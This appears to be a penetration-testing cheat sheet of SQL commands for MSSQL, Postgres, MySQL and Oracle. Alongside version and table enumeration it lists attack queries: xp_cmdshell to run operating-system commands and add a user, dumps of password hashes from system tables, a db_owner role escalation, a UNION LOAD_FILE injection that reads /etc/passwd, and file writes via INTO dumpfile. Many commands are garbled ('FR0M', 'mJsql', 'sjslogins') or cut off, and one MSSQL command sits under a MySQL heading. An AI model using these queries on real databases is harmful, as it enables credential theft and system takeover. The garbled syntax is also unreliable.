Databases

Database

Ms-sql

Command

Description

SELECT @@version

Database version

EXEC xp_msver

version details

EXEC master..xp_cmdshell 'net user'

Run operating system command

SELECT HOST_NAME()

Get Hostname and IP

SELECT DB_NAME()

Current database

SELECT name FROM master..sysdatabases;

List of databases

SELECT user name()

Current user

SELECT name FROM master .. sjslogins

List of users

SELECT name FROM master..sysobjects WHERE xtype= 'U';

list of tables

SELECT name FROM syscolumns WHERE id=(SELECT id FR0M sysobjects WHERE name- 'mjtable' ) ;

List of columns

Information about all database tables in the system table

SELECT TOP 1 TABLE_NAME FROM INFORMATION SCHEMA.TABLES

List of tables and columns

SELECT name FROM Syscolumns WHERE id
(SELECT id FROM Sysobjects WHERE
name='mytable')

Password hash

SELECT name, password hash FROM master.sys.sgl_logins

Bypass user access level

execute('execute(''alter role [db_owner] add member [client]'') at "compatibility\poo_public"')

Postgres

Command

Explanation

SELECT version();

Database version

SELECT inet server_addr()

Get Hostname and IP

SELECT current database();

Current database

SELECT datname FROM pg database;

List of databases

SELECT user;

Current user

SELECT username FROM pg_user;

List of users

SELECT username,passwd FROM pg shadow

List of password hashes

column list

SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A,
pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND
(A.attrelid=C.oid) AND (A.atttjpid=T.oid) AND (A.attnum 0) AND (NOT
A.attisdropped) AND (N.nspname ILIKE 'public')

List of tables

SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN
pg catalog.pg namespace n ON n.oid = c.relnamespace WHERE c.relkind IN
( 'r',") AND n.nspname NOT IN ( 'pg catalog', 'pg toast') AND
pg_catalog.pg_table_is_visible(c.oid)

Mysql

Command

Explanation

SELECT @@version;

Database version

SELECT @@hostname;

Get Hostname and IP

SELECT database();

Current database

SELECT distinct (db) FROM mysql.db;

List of databases

SELECT user();

Current user

SELECT user FROM mysql.user;

List of users

SELECT host,user,password FROM mJsql.user;

Password hash list

List of all tables and columns

SELECT table schema, table name, column_name FR0M
information scherna.columns WHERE
table schema != 'mysql' AND table schema != 'information schema'

Execution of operating system command in mysql

osql -S ip , port -U sa -P pwd -Q "exec xp cmdshell `net user /add user
passr

Reading readable files in mysql

UNION ALL SELECT LOAD FILE( '/etc/passwd');

Writing to the file system in mysql

SELECT * FROM mytable INTO dumpfile '/tmp/somefile';

Oracle

Command

Explanation

SELECT * FROM v$version;

Database version

SELECT version FROM v$instance;

Database version

SELECT instance name FROM v$instance;

Current database

SELECT name FROM v$database;

Current database

SELECT DISTINCT owner FROM all_tables;

List of databases

SELECT user FROM dual;

Current user

SELECT username FROM all_users ORDER BY username;

List of users

SELECT column name FROM all_tab_columns;

List of columns

SELECT table name FROM all_tables;

list of tables

SELECT name, password, astatus FROM sys.user$;

List of password hashes

List of databases

SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';

PreviousWeb NextProgramming

Last updated 2 years ago

hashtagDatabase

hashtagInformation about all database tables in the system table

hashtagList of tables and columns

hashtagPassword hash

hashtagBypass user access level

hashtagPostgres

hashtagcolumn list

hashtagList of tables

hashtagMysql

hashtagList of all tables and columns

hashtagExecution of operating system command in mysql

hashtagReading readable files in mysql

hashtagWriting to the file system in mysql

hashtagOracle

hashtagList of databases

Database

Information about all database tables in the system table

List of tables and columns

Password hash

Bypass user access level

Postgres

column list

List of tables

Mysql

List of all tables and columns

Execution of operating system command in mysql

Reading readable files in mysql

Writing to the file system in mysql

Oracle

List of databases